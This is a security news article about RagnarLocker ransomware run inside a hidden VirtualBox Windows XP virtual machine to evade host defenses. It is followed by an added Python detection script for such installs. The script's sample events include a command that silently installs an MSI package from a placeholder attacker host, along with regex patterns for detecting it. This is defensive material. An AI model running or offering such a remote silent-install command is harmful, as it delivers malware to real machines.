Security researchers are warning of a new ransomware attack technique which runs the malware inside a virtual machine (VM) in order to evade traditional host-based defenses.
Sophos revealed that it recently detected a RagnarLocker attack in which the ransomware was hidden inside an Oracle VirtualBox Windows XP VM.
It said the attack payload was a 122MB installer, with a 282MB virtual image inside concealing a 49KB executable.
“In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server,” Sophos director of engineering, Mark Loman, explained.
The MSI package contained an Oracle VirtualBox hypervisor and a virtual disk image file (VDI) named micro.vdi, which was an image of a stripped-down version of the Windows XP SP3 operating system.
“Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviors can run unhindered, because they’re out of reach for security software on the physical host machine,” said Loman.
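As an added illustration (not from the Sophos write-up or this article), the two observable steps described above, a silent MSI install pulled from a remote web server by msiexec.exe and a VirtualBox hypervisor running from an unpacked location, can be turned into simple process-creation checks. The sample events and the URL host are constructed for the example; the VirtualBox process names and default install directory are assumptions about a standard install.

```python
import re
from typing import Dict, List

# Process-creation records modelled loosely on Sysmon Event ID 1 fields.
# These sample events are constructed for the example, not real telemetry;
# the URL host is a placeholder.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i http://PLACEHOLDER-C2-HOST/update.msi /q"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\tool.msi /qn"},
    {"parent": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\Temp\pkg\VBoxHeadless.exe",
     "cmdline": r"VBoxHeadless.exe --startvm micro"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Oracle\VirtualBox\VirtualBox.exe",
     "cmdline": r"VirtualBox.exe"},
]

# Documented msiexec switches: /i <package> installs; /q, /qn or /quiet suppress the UI.
MSI_REMOTE_PKG = re.compile(r"/i\s+https?://\S+", re.IGNORECASE)
MSI_QUIET = re.compile(r"(?:^|\s)/q(?:n|uiet)?(?:\s|$)", re.IGNORECASE)

# VirtualBox executables and their default install directory (assumed standard
# install); a copy running from anywhere else is the suspicious case.
VBOX_BINARIES = {"virtualbox.exe", "vboxheadless.exe", "vboxsvc.exe"}
VBOX_DEFAULT_DIR = "c:\\program files\\oracle\\virtualbox\\"

def check_event(evt: Dict[str, str]) -> List[str]:
    """Return the names of the rules this event matches (empty if clean)."""
    hits = []
    image = evt["image"].lower()
    basename = image.rsplit("\\", 1)[-1]
    parent = evt["parent"].lower().rsplit("\\", 1)[-1]
    cmd = evt["cmdline"]
    if basename == "msiexec.exe" and MSI_REMOTE_PKG.search(cmd) and MSI_QUIET.search(cmd):
        hits.append("msiexec_remote_silent_install")
    if basename in VBOX_BINARIES:
        if not image.startswith(VBOX_DEFAULT_DIR):
            hits.append("hypervisor_outside_install_dir")
        if parent == "msiexec.exe":
            hits.append("hypervisor_spawned_by_installer")
    return hits

def scan(events: List[Dict[str, str]]) -> List[tuple]:
    """Return (event_index, rule_names) for every event that matched a rule."""
    return [(i, check_event(e)) for i, e in enumerate(events) if check_event(e)]
```

Running `scan(SAMPLE_EVENTS)` flags the remote silent install and the hypervisor launched by the installer, while the local install and the normally installed VirtualBox pass clean.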
The attack appears to have been highly targeted, as the ransom note contained the victim’s name.
RagnarLocker has been active recently: it was used in an attack on Portuguese energy giant Energias de Portugal (EDP) group that demanded a payment of €10m ($11m).